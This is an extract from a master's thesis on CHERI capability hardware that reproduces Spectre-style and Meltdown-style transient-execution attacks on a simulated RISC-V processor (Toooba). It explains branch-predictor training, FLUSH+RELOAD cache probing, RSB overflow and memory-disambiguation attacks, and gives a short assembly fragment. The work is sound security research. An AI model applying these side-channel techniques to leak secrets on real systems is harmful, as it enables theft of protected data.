Capability Hardware Enhanced RISC Instructions (CHERI) is a joint research project of the University of Cambridge and SRI International. The CHERI project has also been joined by Arm Limited who are developing a CHERI- extended System-on-Chip called Morello using the ARMv8-A architecture as the base ISA. The goal of the CHERI project is to enrich ISAs with additional instructions that enable systems to have fine-grained memory protection and compartmentalisation. CHERI can be divided into four parts: The abstract model, the mapping of CHERI to a conventional ISA, the hardware imple- mentation, and the software implementation. This section describes the key points of the four parts of the CHERI project for RISC-V. CHERI is explained more thoroughly in [37], which will be the main source unless stated other- wise.

2.4.1 CHERI Abstract Model The CHERI model itself is abstract – architecture neutral – and can in the- ory be mapped to any concrete architecture. Therefore, CHERI extends an architecture – referred to as the baseline architecture – rather than introduc- ing a new architecture. The CHERI model is designed so that it composes 18 CHAPTER 2. BACKGROUND

well with mechanisms already in contemporary systems. This includes Mem- ory Management Units (MMUs), virtual memory in general, processor ring models, and the exception hierarchy on the baseline ISA. The main concept of CHERI is capabilities. Capabilities are tokens owned by a program that are characterised by being unforgeable and delegatable. A capability authorises a program to access a certain area of memory. CHERI follows two main design principles. First, the designers want to enforce the principle of least privilege. This principle commonly used in the security world says that a program should only get access and rights it needs for correct operation and not more. The sec- ond principle is the principle of intentional use, which expresses that when a choice to select a certain right from a pool of rights exists, this choice has al- ways to be made explicit rather than implicit. The three main project goals of CHERI are to provide fine-grained memory protection, software compart- mentalisation, and viable transition path. A viable transition path means that the transition from the conventional architecture to the CHERI variant of it should be possible with a manageable effort. While the first two CHERI goals are security goals, the latter one is a design goal as the designers assume that CHERI will not be used in practice without being compatible with existing systems. CHERI uses this concept of capabilities and defines their own CHERI Ca- pabilities in order to fulfill its project goals. The key feature of CHERI is that capabilities are not implemented in software, but in hardware. Capabilities and instructions to modify them become part of the ISA. This includes a reg- ister file for CHERI capabilities as they need more space than conventional integer pointers. The CHERI model does not specify how these registers need to be implemented. The implementation can differ from instantiation to in- stantiation. The following text gives an incomplete list of registers defined by CHERI:

General Purpose Capability Registers Their usage is comparable to gen- eral purpose registers on conventional architectures. Code can freely use general purpose capability registers for loading, storing, and manip- ulating capabilities, but these registers can also hold non-capability data. The architectural instantiation can decide how many general purpose ca- pability registers are implemented. Also the concrete implementation determines whether general purpose capability registers are an exten- sion of the general purpose register file defined by the baseline ISA – a merged capability register file – or whether the two register files should be split. CHAPTER 2. BACKGROUND 19

63 0 p’16 otype’18 bounds’27 a’64

p: permissions otype: object type a: pointer address Figure 2.5: Compressed CHERI Capabilities in Memory. Adapted from Wat- son et al [37].

Program Counter Capability (PCC) This register extends the of conventional architectures so that the register holds capabilities in- stead of integer pointers. Every instruction fetch is issued through the PCC.

Default Data Capability (DDC) This register is used if code is not CHERI- aware. All data loads and stores are issued through the DDC. CHERI- aware code does not use the DDC, but more fine-grained capabilities granted to the code running.

Others Depending on the baseline ISA more capability registers are available, e.g., a register for storing the PCC during exception handling.

CHERI Capabilities want to provide hardware aided security for code point- ers. The following attributes are enforced on CHERI Capabilities and must hold at any time.

Bounds The memory accessible by CHERI Capabilities is limited by bounds. An access outside of the bounds is strictly forbidden.

Permissions The kinds of operations that are permitted on the accessible mem- ory are limited by permissions. Like bounds, permissions are part of CHERI Capabilities.

Monotonicity An operation can never add more privileges to a CHERI Ca- pability, but only restrict these privileges.

Integrity and Provenance A CHERI Capability is always derived from an- other valid CHERI Capability and it is ensured at any point of execution that a corrupted CHERI Capability cannot be used as a reference.

Figure 2.5 shows the format of 128-bit CHERI Capabilities in Memory. This is the format used throughout this entire thesis work. CHERI Capabilities 20 CHAPTER 2. BACKGROUND

contain the pointer address itself, the compressed bounds, the object type, and the permissions. The bounds are compressed using the CHERI Concentrate encoding [37, 38]. CHERI defines one bit tags for capabilities that are held both in capability registers and in memory. These tags protect the integrity of capabilities and that capabilities are always derived from a valid capability. The tag bit is not shown in Figure 2.5. The exact bits of 128-bit capabilities are more thoroughly discussed where appropriate for certain attacks in the following chapters. CHERI Capabilities – from now an referred to as capabilities – spread like a tree during runtime. At the CPU start, capability registers hold root capabil- ities that have all permissions set and can access the entire available memory space. Code will monotonically refine root capabilities during runtime as de- sired. Finally, a user-space program will be granted fine-grained capabilities aligned to its needs. These capabilities are the leaves of the tree unless the program decides to refine its capabilities again. The process of deriving capa- bilities defines a chain of provenance. Furthermore, CHERI allows sealing and unsealing of capabilities. A sealed capability is non-dereferencable and immutable, which means that sealed ca- pabilities cannot be manipulated and cannot be used for memory accesses. Un- sealing is only possible with a capability that grants sufficient rights to do so. Sealed capabilities are used for two purposes in CHERI systems even though more use cases are possible. First, they can be passed to untrusted code, e.g. to serve as a token of authority. Second, sealed capabilities can be used for pro- tection domain switching. In an object-oriented environment a sealed code capability and a sealed data capability constitute the object’s code and its ac- cessible data. An atomic operation unsealing both capabilities and jumping to the code capability represents a protection domain switch. In order to comply with the principle of intentional use, CHERI extends the baseline ISA with capability instructions. It is always explicit which operands an instruction has and it cannot by interpreted dynamically, e.g. a load either loads an integer pointer or a capability. CHERI provides the following classes of instructions:

Extract Capability Fields Purpose of these instructions is to copy certain fields of capabilities, e.g. the offset field, to a general purpose regis- ter for inspection reasons.

Move Capability Purpose of these instructions is to move a capability from one capability register to another one without modifying the capability itself. CHAPTER 2. BACKGROUND 21

Manipulate Capability These instructions allow to monotonically change fields of capabilities, e.g. the offset field.

Load and Store These instructions allow to load or store data through a capa- bility, but this class also contains instructions that allow to load or store capabilities through another capability. The capability used for loading or storing has to allow that access by being suitably configured.

Change Control-Flow CHERI offers jump and branch instructions. Whether branches are taken or not depends on capability fields set or not.

(Un)seal Capability These instructions allow to seal or unseal a capability with another authorising capability. Also, this class of instructions con- tains protection domain switching.

Check Capability These instructions check whether capability fields match expected values and throw an exception if this is not the case.

2.4.2 CHERI-RISC-V CHERI-RISC-V [37] is the mapping of the abstract CHERI model to RISC-V. As explained above, RISC-V is an ISA design space due to its modular design. CHERI-RISC-V can therefore also be considered an ISA design space. A par- ticular instantiation of CHERI-RISC-V may choose to implement multiple op- tions described in the following paragraphs in a way that it is parameterisable. Both 32-bit and 64-bit RISC-V are extended for CHERI. The CHERI de- signers also express the possibility of a 128-bit CHERI-RISC-V mapping when RISC-V has evolved that far. The length of capabilities is 64 bits for 32-bit CHERI-RISC-V and 128 bits for 64-bit CHERI-RISC-V not including the tag bit. CHERI-RISC-V describes both split and merged register files. The goal of the CHERI project is to provide hardware that offers memory protection and compartmentalisation for all kinds of application areas. In a merged register file, a general purpose register has the width to hold a capability as well. A merged register file helps to reduce the amount of logical gates on a chip where this is necessary, e.g., ISAs for embedded processors like RV32E. However, the principle of intentional use has to be fulfilled. An access to register must never be ambiguous in the way its value is interpreted. Besides the load and store instructions for bytes, half-words, words, and double-words CHERI-RISC-V also extends RISC-V for instructions that can 22 CHAPTER 2. BACKGROUND

load and store floating point values through capabilities. Furthermore, CHERI- RISC-V allows atomic operations to work with capabilities. Therefore, all memory accesses in a CHERI-RISC-V can be handled through capabilities if this is desired by the program. CHERI-RISC-V offers also compressed CHERI instructions. When executed in capability pointer mode, each implicit register operand by the compressed instruction is expected to be the capability variant of the corresponding register. Furthermore, CHERI-RISC-V introduces Special Capability Registers (SCRs) that extend conventional RISC-V registers, but also add new registers. The purpose of SCRs is to enable exception handling with capabilities. They extend {m,s,u}{tvec,epc,scratch} and add new data capabilities for each of the three privilege levels for their respective memory areas. CHERI-RISC-V also extends RISC-V CSRs for capability functioning. Last, CHERI-RISC-V en- riches RISC-V’s Page Table Entrys (PTEs) such that there is one bit that spec- ifies whether capabilities might be stored to that page and one bit that specifies whether a capability might be loaded from that page.

2.4.3 CHERI-RISC-V Hardware The CHERI project contains three RISC-V processors that have been extended with CHERI instructions: Piccolo1 is an in-order, 3 stage pipeline processor that implements RV32ACIMUxCHERI, where xCHERI means that this pro- cessor implements CHERI-RISC-V as well. Flute2 is an in-order, 5 stage pipeline processor that implements RV64ACDFIMSUxCHERI and supports virtual memory as well. Toooba3 is an out-of-order, deep, and superscalar pro- cessor that implements RV64ACDFIMSUxCHERI and supports virtual mem- ory.

2.4.4 CHERI Software Stack There is a large software stack of programs that have been created especially for CHERI systems or adapted for them. In this section, I describe the impor- tant bits with respect to the work conducted in this thesis.

1available at https://github.com/CTSRD-CHERI/Piccolo 2available at https://github.com/CTSRD-CHERI/Flute 3available at https://github.com/CTSRD-CHERI/Toooba CHAPTER 2. BACKGROUND 23

CHERI-LLVM The LLVM framework can be split into two parts: the front-ends and back- ends. The main tasks of the front-ends is to parse the input files and generate output that is used by the back-ends – the Intermediate Representation (IR). LLVM supports multiple front-ends, e.g., clang in order to compile C/C++. Furthermore, each target ISA has its own back-end that generates machine code specific to that ISA. The CHERI project extended the clang front-end generically for all supported ISAs such that pointers are represented by capa- bilities instead of integer values. However, each back-end has to be tailored for the particular underlying ISA, e.g. MIPS or RISC-V, in order to produce the correct CHERI instructions needed. These changes constitute the CHERI- LLVM framework4. The CHERI-LLVM compiler framework also includes other tools not needed for compiling in the first place, but that are helpful for debugging, e.g., riscv64cheri-objdump.

Operating Systems The CHERI software stack includes two operating systems that have been adopted to run on a CHERI processor. CheriBSD5 is a fork of FreeBSD and receives the main research focus in OS research within the CHERI project. CheriBSD provides CheriABI [39], which is an Application Binary Interface such that applications that use CHERI can communicate with the kernel. The kernel itself does not need to use capabilities internally, but can. The pure- capability CheriBSD kernel is currently a work-in-progress. CheriRTOS6 is a fork of FreeRTOS and intended as a pure-capability system from the very beginning [40].

2.4.5 CHERI Security Model CHERI aims to implement two security principles: fine-grained memory pro- tection and software compartmentalisation. These two principles need to be guaranteed in all implementations – including in speculation and out-of-order execution. Cache timing side channels as described in Section 2.2.3 are not part of the security model. AMD states that their architectures do not pre- vent cache timing side-channel attacks as well and argues that these attacks have to be prevented by software [41]. Arm states that timing side-channel

4available at https://github.com/CTSRD-CHERI/llvm-project 5available at https://github.com/CTSRD-CHERI/cheribsd 6available at https://github.com/CTSRD-CHERI/cherios 24 CHAPTER 2. BACKGROUND

attacks were no novelty. However, timing side-channel attacks in connection with transient execution were not known [32]. CHERI does not guarantee the absence of timing side channels, but should give guarantees about transient execution. This means that transiently executed instructions should not lead to any privilege escalation. An attacker should never have access to more ca- pabilities than those granted by the architectural register state and the capabil- ities reachable through those. Furthermore, CHERI-RISC-V systems should follow the security model required by RISC-V, which includes separating M, S, and U privilege mode and their access rights. Attacks can be divided into three classes expressed in the dependency of the victim:

Independent This class of attacks does not require any action or help from the “victim”.

Exploitative This class of attacks requires the “victim” to unknowingly or unwillingly cooperate with the attacker.

Collusion This class of attacks requires the “victim” to willingly collaborate with the attacker.

It is expected that attackers are able to execute arbitrary code on a CHERI system, e.g., a user limited to a sandbox who turned into an attacker. An exam- ple for this could be a JavaScript pulled from web when rendering a web page. Therefore, an attacker is assumed to be able to attempt independent attacks. Meltdown-style attacks – as explained in Section 2.2.2 – are typical indepen- dent attacks. It is further expected that the entire CHERI system should be safe in the presence of such an attacker even in the case of instructions only being executed transiently. Furthermore, a CHERI system has to expect that an at- tacker will attempt exploitative attacks by trying to get the unwitting help of other code running on the system and having access to powerful capabilities. Spectre-style attacks – as explained in Section 2.2.1 – are typical exploitative attacks. For CHERI implementations, any willing collaboration from the vic- tim side is not expected, which excludes the class of collusion attacks from the security model used in this thesis work.

2.5 Related Work

Woodruff et al. [21] discussed the applicability of Spectre-PHT, Spectre-BTB, and Meltdown-US on CHERI systems. They clearly state that capability fields must not be subject of speculation, but all CHERI checks have to be finished CHAPTER 2. BACKGROUND 25

successfully before accessing memory. Otherwise the protection mechanisms of CHERI are likely to be bypassed. They are especially concerned about cross protection domain attacks on CHERI systems. Therefore, they propose the introduction of a CID that specifies when microarchitectural state may be shared with other protection domains. Gonzalez et al. [42] were the first ones to demonstrate speculative execu- tion attacks on a RISC-V processor. They successfully reproduced Spectre- PHT and Spectre-BTB on the Berkeley Out-of-Order Machine (BOOM) [43], but no other speculative attacks. Furthermore, they did not attempt to conduct Meltdown-style transient-execution attacks. However, Gonzalez et al. stated the theoretical feasibility of the remaining transient-execution attacks, which is proved in my work. Similar work on the BOOM processor has been done by Le et al. [44]. There has been more work conducted on other comparable RISC archi- tectures. Arm has summarised and explained the most impactful transient- execution attacks and explained how they would be conducted on an Arm microarchitecture [32]. Furthermore, Arm has evaluated which of its mi- croarchitectures are vulnerable to which attack [45]. The covered attacks are Spectre-PHT, Spectre-BTB, Spectre-RSB, Spectre-STL, Meltdown-US, and Meltdown-GP – the attack names used by Arm do not follow the naming scheme of this work though. Arm clearly states that all other microarchitec- tures unlisted are not vulnerable to any transient-execution attack. None of the listed microarchitectures are vulnerable to all attacks, but only to a subset. However, Spectre-PHT was classified successful on all listed microarchitec- tures. Moreover, each attack could be reproduced on at least one of Arm’s microarchitectures. As stated by Canella et al. [19], Arm’s processors are only vulnerable to a subset of Meltdown-style attacks that Intel’s and AMD’s processors are vulnerable to. Many Meltdown-style attacks are tailored to the x86_64 architecture and special features of various implementations of it. Nei- ther Arm’s ISA nor RISC-V have the necessary features and therefore no im- plementation is vulnerable to this subset of Meltdown-style attacks. Due to the similarity in the architectural style, Arm’s summary of attacks also sets the scope of this work. The four Spectre attacks, Meltdown-US, and Meltdown- GP will be the main target of this work. Chapter 3

Methods

In this chapter, I describe the resources I used to conduct my experiments. Furthermore, I explain which research methods I applied for which part of this work. The last part of this chapter is to describe common methods I used and how the actual measurements were conducted.

3.1 Toooba

The experiments presented in Chapters 4 and 5 are conducted on CHERI’s fork of the out-of-order processor Toooba. Toooba itself has been developed by Bluespec Inc. that added compressed instructions support for debugging to MIT’s RISCY-OOO [46] – a framework that allows parameterisable config- uration of the processor to be built. RISCY-OOO is written in the Bluespec SystemVerilog Hardware Description Language (HDL) that allows configu- ration to be conducted more easily. Bluespec HDL code can be simulated directly or can be compiled to Verilog code, which then can be simulated by a Verilog simulator or it can be used to produce a FPGA image. For all my experiments, I compiled Toooba’s code to Verilog code using the open-source Bluespec compiler1 (release 2020.02). I used the verilator (Version 3.916) simulator2 in order to produce the results presented in Chapters 4 and 5. Figure 3.1 shows the parameterisable RISCY-OOO pipeline that is used in Toooba. The pipeline can be divided into three separate parts: Fetch, Execute, and Commit. In this figure, the Fetch stage includes decoding and renaming as well, which is not the case in conventional models of the pipeline, e.g. by Pat- terson and Hennessy [14]. This part is also called the front-end of Toooba and

1available at https://github.com/B-Lang-org/bsc 2available at https://github.com/verilator/verilator

26 CHAPTER 3. METHODS 27

Fetch Execute Commit BTB n/2 Fetch 1 IQ FPU Commit TLB n er

Fetch 2 n ff IQIQ ALUALU I $

Fetch 3 Reorder Bu Reorder /Forwarding Register IQ MEM Decode

D $ Rename

Figure 3.1: The parameterisable RISCY-OOO pipeline. In my configura- tion, I chose n=2, which means that Toooba has two ALU pipelines, one FPU pipeline, and one memory pipeline. 3 instructions are handled in-order in this part. The rename stage puts instruc- tions in the reservation stations of the respective pipelines of which Toooba has three: the Arithmetic Logic Unit (ALU) pipeline, the Floating Point Unit (FPU) pipeline, and the memory pipeline. The ALU pipeline can handle n , the FPU pipeline n~2 instructions per cycle, and the memory pipeline one instruction per cycle. The Execute part of Toooba in- cluding all three pipelines is completely out-of-order and can execute instruc- tions as soon as all operands are available to it. In my configuration of Toooba, I chose n = 2, which means that Toooba can fetch, decode, rename, issue, and retire 2 instructions in one cycle if no bubbles appear in the pipeline, e.g., misprediction may cause Toooba not to be able to commit any instruction for multiple cycles. Toooba has two ALU pipelines, one FPU pipeline, and one memory pipeline in my configuration. Processors that can execute more than one instruction per clock cycle are called superscalar processors. In my in- stantiation, Toooba is a 2-superscalar processor because it can execute two instructions per cycle. Furthermore, I used the TEST cache configuration, which determines the following settings: The L1 data and instruction cache are each 2 KiB large and

3This figure is borrowed from the CHERI team 28 CHAPTER 3. METHODS

Out-of-order window size 64 L1 size 2 KiB L2 size 8 KiB L1/L2 ways 2 Cache line size 64 byte Load Queue size 24 Store Queue size 14 Store Buffer size 4

Table 3.1: The parameters of the Toooba configuration used for my experi- ments.

2-way associative, the L2 cache has a size of 8 KiB and is 2-way associative as well, and cache lines are 64 bytes long. Toooba has a window of 64 instruc- tions that can be executed out-of-order and the memory queues (load queue, store queue, store buffer) are capable of tracking 38 outstanding memory in- structions. Toooba supports Sv39, which means that virtual addresses are 39 bits long. These data are summarised in Table 3.1. In order to successfully conduct Spectre-BTB attacks as presented in Chap- ter 4 and 5, I needed to make changes to Toooba’s BTB. Before my changes, Toooba did not use a hashing function for tag, but used the entire address. I implemented a hashing function, which is described in Section 5.1.3 as it poses a contribution to the research platform. Having a hashing function for tags in the BTB is a common mechanism used in industry [22]. Therefore, I find that my changes to Toooba’s BTB are no simplification of my work, but more an adaption to the real-world setup.

3.2 Research Methodology

In this master’s thesis work, I used quantitative research methods in order to prove the hypothesis of transient-execution attacks being feasible on Toooba. Transient-execution attacks will be reproduced in assembly and C code. I rely on the compiling toolchain including the compiler, linker, and assembler to be correct in order to produce meaningful results. The success of attacks will be determined on whether the access time to certain memory data is signif- icantly faster than to others. For all attempted attacks, I used the verilator simulator, which generates a cycle-accurate model of Toooba’s Verilog code. In order for my results to be meaningful, I rely on the verilator simulation to CHAPTER 3. METHODS 29

be correct. Furthermore, the explanation of why an attack works in Toooba or not is conducted with quantitative methods as simulation gives clear and objective evidence of which actions Toooba takes when certain scenarios have happened. In the discussion of the different transient-execution attacks, I mainly use quantitative research methods as well. Some Spectre-style attacks are run with a mitigation mechanism enabled giving quantitative results whether a specific attack is successful or not. However, I will also use qualitative methods in order to describe which impact certain attack classes have. The impact of an attack is determined by the threat model. Threat models and evaluating threats corresponding to them requires opinions and cannot be expressed in objective and quantitative data.

3.3 Common Mechanisms

This subsection summarises common techniques used for the experiments con- ducted in Chapters 4 and 5 or in order to prepare them.

3.3.1 Flushing Caches Flushing caches is used by transient-execution attacks for two reasons. First, flushing caches – or evicting a specific cache line – leads to longer miss penal- ties for loads and more accurate timing analysis. Second, flushing caches pro- vides a clean state before conducting timing measurements. As explained in Chapters 4 and 5, attackers want to create the situation that the processor mis- speculates and the time span until the misprediction is discovered and instruc- tion are rolled back to be as long as possible. This can be achieved by making load requests go all the way to memory and not hitting any of the caches. As described in Section 3.3.2, probing the caches needs a clean state in order to achieve reliable results. As stated in Table 3.1, Toooba’s L1 data cache in the TEST configuration has space for 2 KiB and the L2 cache has space for 8 KiB. RISC-V does not have a dedicated flush instruction and CHERI-RISC-V does not provide one either [11, 12, 37]. This means that attackers need to implement their own flush functions. I implemented a function that loads an entire memory region into the caches and therefore evicts content previously present. This function loads in a granularity of 64 bytes as for each load the entire respective cache line will be loaded. 30 CHAPTER 3. METHODS

3.3.2 Timing Measurements For the attacks presented in Chapters 4 and 5, I always use the same mech- anism in order to prove that an attack has been conducted successfully. The code under attack will speculatively load a value into the core. This value is used as an index into a shared array between victim and attacker. Probing the access times to values in this shared array will allow the attacker to recover the original secret. Throughout all my experiments, I use FLUSH+RELOAD [18], which is an access-driven technique. In order to successfully probe the cache, the attacker evicts all cache lines of the array to probe – the flush phase – and then starts the attack. This leads to the situation that the only cache line of the shared array being present is the one that was speculatively accessed to reveal the secret. As a next step, the attacker accesses value after value in the shared array and measures the time it takes to access the array as precisely as possible – the reload phase. The attacker does probe on the granularity of cache lines, which means on the granularity of 64 bytes in Toooba. The results of probing the memory addresses [0x80001000, 0x800017ff] are depicted in Figure 3.2. As stated in Table 3.1, Toooba’s L1 data cache has 32 lines, which are indexed by [0,..., 31]. This number of cache lines exactly matches the 0x800 bytes, which the attacker wants to probe in steps of 64 bytes. In the example in Figure 3.2, the victim code has speculatively accessed a double-word at the address 0x80001100. This reflects exactly the data as the cache line with index four has a significantly shorter access time than all other cache lines. All other memory accesses but the very first one require roughly 30 cycles with only small variations. However, the first memory access is significantly slower with 60 cycles needed. This can be explained with the cold branch predictor in the assembly code of the probe function. The cold branch predictor makes Toooba load instructions on a cache line not being present, which leads to this delay. The attacker can only measure the presence of a certain cache line, but not which exact address made the cache line being loaded. This means that the attacker can only leak a very limited number of bits per probing attack. In my work, I do not use cache bank collision attacks as described in [47]. Therefore, the only information the attacker can gain is which cache line has been accessed compared to all possible cache lines.

log2(#cache − lines) = log2(32) = 5 bits (3.1) Equation 3.1 shows the amount of information an attacker gains in general CHAPTER 3. METHODS 31

60

50

40

30

Cycles Needed 20

10

0 0 4 8 12 16 20 24 28 Cache Line Number

Figure 3.2: Results of probing the L1 cache after an attack has been conducted. and the exact number in my configuration of Toooba. In order to recover more than five bits, an attacker will need to conduct the attack multiple times, e.g., for a full 64 bit double-word to be recovered an attacker has to do that attack 13 times. The speed of leaking values determines the success of real-world at- tacks [22, 27]. However, this is out of scope for this thesis work. In Chapters 4 and 5, I present attacks attempted and whether they have been conducted suc- cessfully, which implies that they are capable of leaking information, but no claims about the speed and implications of their impact on real-world attacks are made. Chapter 4

RISC-V Results

In this chapter, I describe the results obtained by reproducing the different transient-execution attacks described in Chapter 2 on RISC-V Toooba. To my knowledge, this work is the first one to reproduce all four Spectre-style attacks on a RISC-V processor. All attacks together build an extensible framework for exploring transient-execution attacks on RISC-V processors, which con- stitutes a platform for further research not only on Toooba, but on any other vulnerable processor. An extension to the framework is contributed by the work described in Chapter 5, which extends all Spectre-style RISC-V attacks to CHERI-RISC-V attacks and adds new Meltdown-style attacks. Describing the reasons for the success or failure of Spectre-style attacks in both this chap- ter and the chapter about the CHERI-RISC-V results would introduce many redundancies. Therefore, I decided to only give a high-level explanation for most attacks in this chapter and deeply dive into Toooba’s pipeline in the fol- lowing chapter.

4.1 Spectre Attacks

This section contains the Spectre-style attacks attempted on RISC-V Toooba in assembly and C. The results are depicted in Table 4.1. An entry marked with (✓) means that this attack was conducted successfully, (✗) means that I could not craft a successful attack. An entry marked with (-) indicates that I did not attempt an attack at all. All attacks could be reproduced successfully in RISC-V assembly. In order to prove the general applicability, the Spectre- PHT, Spectre-BTB, Spectre-RSB, and Spectre-STL-Load attacks have been reproduced in C as well.

32 CHAPTER 4. RISC-V RESULTS 33

asm C Spectre-PHT ✓ ✓ Spectre-PHT-Write ✓ - Spectre-BTB ✓ ✓ Spectre-RSB ✓ ✓ Spectre-STL-Load ✓ ✓ Spectre-STL-Jump ✓ -

Table 4.1: Overview of attempted Spectre-style attacks on RISC-V Toooba and whether they were successful.

4.1.1 Spectre-PHT The reproduction of Spectre-PHT in both RISC-V assembly and C was con- ducted as described in [22]. The important piece of Spectre-PHT attacks is to train the branch direction predictor. The riscy-OOO processor implements multiple branch direction predictors. Toooba uses a tournament predictor, which consists of one local and one global predictor. Both the local and the global predictor have their own Branch History Table (BHT). A two bit selec- tor determines which of these two predictors is used for the actual response of the tournament predictor. The goal of the attack is to train the prediction for the branch-greater-equal (bge) instruction such that it predicts not taken when the actual attack will be conducted. To achieve that, attack- ers have two options. They can either train the global predictor to return not taken for that particular branch or they can train the local predictor to return not taken. The attacker has to keep in mind that it is important to train the selector accordingly as well. In Section 5.1.1, I explain thoroughly how I train the tournament predictor in order to achieve a successful attack. The principle of training remains the same over all Spectre-PHT attacks I conducted. In later stages of this work, I reviewed Toooba’s branch direction predic- tion and made the following observation. When a specific branch is predicted the first time by the tournament predictor, the predictor always uses the local branch prediction unit. Furthermore, the local branch predictor is initialised with predicting False for the first prediction. Therefore, whenever Toooba en- counters a branch the first time, it will be predicted to False. For the Spectre- PHT attack as shown in Figure 5.1, this means that the branch prediction does the attacker-desired action by default. Therefore, an attacker does not need a training phase to conduct a successful attack, which I have confirmed in a 34 CHAPTER 4. RISC-V RESULTS

pratical example of Spectre-PHT. This helps the attacker in two ways. First, the attack becomes easier as no previous training calls are needed and second the attacker saves time, which positively affects the bandwidth of a real-world attack.

4.1.2 Spectre-PHT-Write This variant of Spectre-PHT seeks to conduct a speculative write instead of a speculative load [34]. Out-of-bounds writes can be used to direct control-flow to a gadget of interest for the attacker, e.g., by overwriting the return address re- siding on the software stack. Speculatively overwriting a return address can be the starting point of a Return-Oriented Programming (ROP) attack [48]. With code not using capabilities, I successfully crafted an attack that overwrites the return address such that the control-flow will be speculatively directed to a gadget revealing a register value.

4.1.3 Spectre-BTB Following Canella et al. [19], all Spectre-style attacks can be conducted in- place and out-of-place. However, throughout my thesis work, Spectre-BTB is the only attack were I attempted both attack types. In Figure 4.1, both the in-place and the out-of-place variant is depicted. On the left side, the two in- direct jumps are mapped to the same BTB entry and therefore one jump can impact the prediction of another jump. The exact explanation of why and how a BTB entry is aliased in Toooba is given in Section 5.1.3. On the right side of Figure 4.1, there is only one jump that trains the BTB. Depeding on whether funct is called from call_0 or call_1, the jump will take different direc- tions. Therefore, previous calls to funct impact the branch target prediction of that jump. Both attacks reach the same goal, which is training a BTB entry. I reproduced both attacks with code similar to the one shown in Figure 4.1 and both attacks were successful. For the remainder of this thesis, I only use Spectre-BTB out-of-place as it I believe it is more convenient for an attacker to directly poison the BTB instead of indirectly calling another function. There- fore, I will use the abbreviation Spectre-BTB for the out-of-place variant.

4.1.4 Spectre-RSB The goal of Spectre-RSB attacks is to create a mismatch between hardware and software return addresses. In order to reproduce this attack, I created examplary code, which fetches its return address from memory and returns CHAPTER 4. RISC-V RESULTS 35

call_0: la a0, addr_0 jal ra, funct

... 800000c8: jr t1 call_1: ... la a0, addr_1 jal ra, funct 800202c8: jalr t1 ...

funct: jr a0 Figure 4.1: Left: Spectre-BTB out-of-place, right: Spectre-BTB in-place. to this address. This does not match the address predicted by hardware and therefore allows an attacker to alter control-flow in speculation. I conducted a similar attack for CHERI-RISC-V processors and because of redundancies, the attack is only thoroughly explained in Section 5.1.5. Another option to create a mismatch between the software and hardware return address stacks is to – if allowed by hardware – let the RSB overflow [23, 24]. In Toooba, the RSB has room for eight return addresses. If the call depth is greater than eight function calls, the subsequent return addresses will over- write the ones already present. This can be used by an attacker to conduct a Spectre-RSB attack as well. I created an attack, which causes a recursive func- tion to call itself more than eight times. This fills all entries of the RSB with return addresses pointing to instructions in the code of the recursive function. The returns to the recursive function will be predicted correctly, but the jump returning to the calling function will be mispredicted and will execute parts of the recursive function one more time, which reads out-of-bounds values in my example.

4.1.5 Spectre-STL Spectre-STL is based on memory disambiguation making wrong predictions. I successfully conducted the attack described in Figure 2.4. Again, the repro- duction in CHERI-RISC-V assembly is similar and therefore the exact reasons will be described in Section 5.1.6. This attack will be referred to as Spectre- 36 CHAPTER 4. RISC-V RESULTS

asm Meltdown-US ✗ Meltdown-GP ✗

Table 4.2: Overview of attempted Meltdown-style attacks on RISC-V Toooba and whether they were successful.

STL-Load. Besides revealing a secret through two loads, the attacker can fol- low another goal – jumping to an arbitrary target . This attack is referred to as Spectre-STL-Jump. This attack is based on the same principles as Spectre- STL-Load. However, the attack requires a preparation phase in which the at- tacker inserts a valid code address. This code address is stored at the address, whose content is loaded twice due to wrong memory disambiguation. There- fore, the load that is predicted to be independent does not load a secret value, but a valid code address. If this code address is used in a jump before Toooba recognises that its memory disambiguating was wrong, the attacker will be able to jump to any arbitrary target.

4.2 Meltdown Attacks

In this section, I describe the Meltdown-style attacks attempted on RISC-V Toooba. The attacks and their respective outcomes are summarised in Ta- ble 4.2, which shows that none of the attempted attacks could be conducted successfully. However, these two attacks are an essential part of the test suite as their analysis shows how to prevent them. Furthermore, it is important to test new implementations such that no conventional Meltdown-style attack is possible.

4.2.1 Meltdown-US For Meltdown-US, I created a scenario as it would be the case when a real operating system is running. In my setup, the operating system code runs in S privilege mode and has its own code and data page. The U(ser) bit is cleared for both S mode pages, which means that U mode code cannot access these pages. The attacker code runs in U privilege mode and also has its own code and data page. Similar to Meltdown-US-CHERI presented in Section 5.2.1, the attacker tries to access data without having sufficient permission – in Meltdown-US on CHAPTER 4. RISC-V RESULTS 37

ExeMem FinishMem

TLB-Req Check ReorderBuf

Figure 4.2: The last two stages of the Toooba memory pipeline which performs permission and capability checks. the granularity of 4KiB pages. The translation from virtual to physical addresses is conducted in the last stage of the memory pipeline in Toooba as shown in Figure 4.2. The ExeMem stage sends the request to the Translation Lookaside Buffer (TLB) and the FinishMem stage receives the corresponding response. Besides the physical address the access rights are available at this stage as well. Therefore, the exception – a page fault – will be set to the cause field of the Load-Store Queue (LSQ) entry of this memory access. This load will never be issued and thus Meltdown-US is not possible on Toooba.

4.2.2 Meltdown-GP The Meltdown-GP attack seeks to read a register, which the code has no per- missions to read. In my reproduction of the Meltdown-GP attack, user mode code attempts to read the CSR mcause, which is forbidden as it is a register only accessible by M mode code. The memory access is followed by a load to an attacker-accessible array in order to make the secret visible. However, as marked in Table 4.2, the Meltdown-GP attack is not possible on Toooba. Checking which privilege mode is necessary is done as a part of the Rename stage in Toooba. If the necessary privilege mode is not present, the Rename stage will modify the respective Reorder Buffer (ROB) entry so that the cause field is set to the exception to be raised. Furthermore, the in- struction is marked as executed in the entry, which means that it never enters the ALU pipeline. Therefore, the result will never be produced, which miti- gates the attack as the following transient-instruction sequence cannot reveal the secret register value. Chapter 5

CHERI-RISC-V Results

The main part of my thesis work was to extend my test framework for CHERI- RISC-V processors. This collection of attacks shows how to practically use the base framework presented in Chapter 4. In this chapter, I investigate whether CHERI mitigates transient-execution attacks and how effective CHERI is in that case. To my knowledge, this work is the first to practically reproduce any transient-execution attack on a CHERI-RISC-V system. The attacks pre- sented in this chapter extend the conventional attacks presented in Chapter 4. Furthermore, I will introduce a new transient-execution attack subclass that allows attackers to forge arbitrary and powerful capabilities in Toooba.

5.1 Spectre Attacks

As shown in Table 5.1, I successfully reproduced all four main Spectre attacks and several applications of it on CHERI-RISC-V systems. In this section, I do not describe every attack thoroughly as some of them have large similarities. In this thesis work, I carried out examples in C as well. As depicted in Table 5.1, these could be conducted successfully, but they will not be described in this section as they do not pose a significant contribution to the vulnerability profile of Toooba. However, an exemplary C attack is described in Appendix A.

